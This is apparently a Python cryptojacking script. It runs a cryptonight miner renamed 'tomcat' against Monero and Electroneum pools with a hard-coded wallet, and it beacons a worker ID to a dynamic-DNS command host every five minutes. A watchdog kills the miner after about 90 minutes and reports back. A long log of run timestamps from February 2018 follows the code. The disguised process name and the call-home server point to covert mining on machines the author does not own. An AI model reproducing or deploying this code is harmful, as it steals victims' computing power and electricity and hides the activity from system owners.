import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:40:07.514547
#2018-02-17 16:27:03.491637
#2018-02-17 18:13:07.415777
#2018-02-17 20:00:08.135004
#2018-02-17 21:49:03.953064
#2018-02-17 23:35:07.816059
#2018-02-18 01:24:01.579363
#2018-02-18 03:11:05.509101
#2018-02-18 05:01:05.017338
#2018-02-18 06:53:05.199190
#2018-02-18 08:40:01.575257
#2018-02-18 10:26:01.393240
#2018-02-18 12:12:04.850256
#2018-02-18 13:58:05.448885
#2018-02-18 15:48:04.326662
#2018-02-18 17:37:05.463897
#2018-02-18 19:25:08.374397
#2018-02-18 21:10:07.135470
#2018-02-18 22:57:01.871703
#2018-02-19 00:44:02.150942
#2018-02-19 02:31:05.888159
#2018-02-19 04:17:05.632136
#2018-02-19 06:02:01.681467
#2018-02-19 07:49:01.251205
#2018-02-19 09:39:05.756697
#2018-02-19 11:29:01.604635
#2018-02-19 13:17:01.883813
#2018-02-19 15:05:01.943214
#2018-02-19 16:52:09.202630
#2018-02-19 18:40:10.575130
#2018-02-19 20:26:08.726326
#2018-02-19 22:14:01.899087
#2018-02-20 00:00:09.191702
#2018-02-20 01:47:01.459523
#2018-02-20 03:34:06.470441
#2018-02-20 05:21:06.613895
#2018-02-20 07:06:04.319850
#2018-02-20 08:52:01.219690
#2018-02-20 10:35:08.684799
#2018-02-20 12:22:07.955272
#2018-02-20 14:09:07.164893
#2018-02-20 15:53:01.815465
#2018-02-20 17:39:08.953833
#2018-02-20 19:27:04.500794
#2018-02-20 21:14:03.743565
#2018-02-20 22:58:03.918335
#2018-02-21 00:43:07.908893
#2018-02-21 02:29:02.214977
#2018-02-21 04:16:01.563579
#2018-02-21 06:02:05.379387
#2018-02-21 07:51:05.048880
#2018-02-21 09:38:05.584197
#2018-02-21 11:25:10.876912
#2018-02-21 13:13:09.841630
#2018-02-21 14:58:07.188513
#2018-02-21 16:47:07.779280
#2018-02-21 18:37:05.695211
#2018-02-21 20:22:07.262283
#2018-02-21 22:10:07.923515
#2018-02-22 00:02:05.722101
#2018-02-22 01:50:05.930642
#2018-02-22 03:36:05.416781
#2018-02-22 05:22:03.780123
#2018-02-22 07:08:07.128187
#2018-02-22 08:56:06.754632
#2018-02-22 10:46:01.908512
#2018-02-22 12:32:07.633276
#2018-02-22 14:19:01.882201
#2018-02-22 16:06:09.950053
#2018-02-22 17:53:05.579287
#2018-02-22 19:41:05.662791
#2018-02-22 21:32:10.468449
#2018-02-22 23:19:06.714629
#2018-02-23 01:06:05.637489
#2018-02-23 02:54:02.170412
#2018-02-23 04:43:04.377814
#2018-02-23 06:29:04.490977
#2018-02-23 08:16:04.464059
#2018-02-23 10:32:01.877116
#2018-02-23 12:26:09.841758
#2018-02-23 14:13:08.496791
#2018-02-23 16:04:06.544354
#2018-02-23 17:49:05.868463
#2018-02-23 19:36:01.344307
#2018-02-23 21:19:04.221099
#2018-02-23 23:07:05.147253
#2018-02-24 00:56:06.479185
#2018-02-24 02:51:04.472211
#2018-02-24 04:40:08.768995
#2018-02-24 06:24:05.567356
#2018-02-24 08:12:01.859651
#2018-02-24 09:56:03.589421
#2018-02-24 11:51:06.286685
#2018-02-24 13:42:08.439716
#2018-02-24 15:30:01.583700
#2018-02-24 17:21:04.674781
#2018-02-24 19:10:08.727276
#2018-02-24 20:59:01.503974
#2018-02-24 23:27:06.913150
#2018-02-25 03:43:01.647984
#2018-02-25 06:35:04.424287
#2018-02-25 11:40:08.418133